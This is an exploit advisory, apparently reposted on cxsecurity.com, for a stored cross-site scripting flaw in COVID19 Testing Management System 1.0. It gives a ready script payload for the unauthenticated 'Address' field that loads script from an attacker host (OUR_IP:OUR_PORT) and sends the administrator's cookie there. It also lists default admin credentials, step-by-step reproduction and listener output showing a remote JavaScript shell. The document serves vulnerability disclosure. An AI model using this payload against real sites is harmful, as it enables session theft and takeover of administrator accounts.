COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS)

2021.06.14
gb BHAVESH KAUL (GB) gb
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS) # Date: 11 June 2021 # Exploit Author: BHAVESH KAUL # Author Linkedin: https://www.linkedin.com/in/bhavesh-kaul-cs/ # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Server: XAMPP # Description # COVID19 Testing Management System 1.0 is vulnerable to Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS) because of insufficient user supplied data sanitization and the payload being executed in the administration panel successfully. Anyone can submit a stored XSS payload without login when registering a new user. This makes the application store our payload in the database and it is fired when the administrator views the new user details, making us load our crafted javascript reverse shell and allowing us to execute code and do other exploitation easily. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/covid-tms/new-user-testing.php 2) Enter the following payload in 'Address' parameter: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//OUR_IP:OUR_PORT/?"+document.cookie},1010)</script> 3) Fill out other information and submit query 4) Now login as administrator: Test Credentials = admin | Test@123 5) Goto: http://localhost/covid-tms/new-test.php 6) Click on 'View Details' for your recently added entry 7) Our XSS payload is fired and We got a reverse shell session in our terminal: [~] Waiting for the payload to be executed listening on [any] 33 ... connect to [10.0.2.15] from (UNKNOWN) [10.0.2.15] 49872 GET / HTTP/1.1 Host: Redacted-IP:Redacted-Port User-Agent: -redacted- Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/ DNT: 1 Connection: keep-alive [+] Victim is online. Enter JS code to execute. 8) Now we execute the javascript commands to get the document cookie (auth session cookie) and perform other actions such as infect all the links on the webpage and perform unauthenticated data manipulation. # Reference Image # 1) Vulnerable Parameter: https://ibb.co/s5t0Xhr 2) XSS Payload Fired & Reverse Shell Established: https://ibb.co/NyW3j3F 3) Reverse-Shell Payload Fired: https://ibb.co/P1R9ShW


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top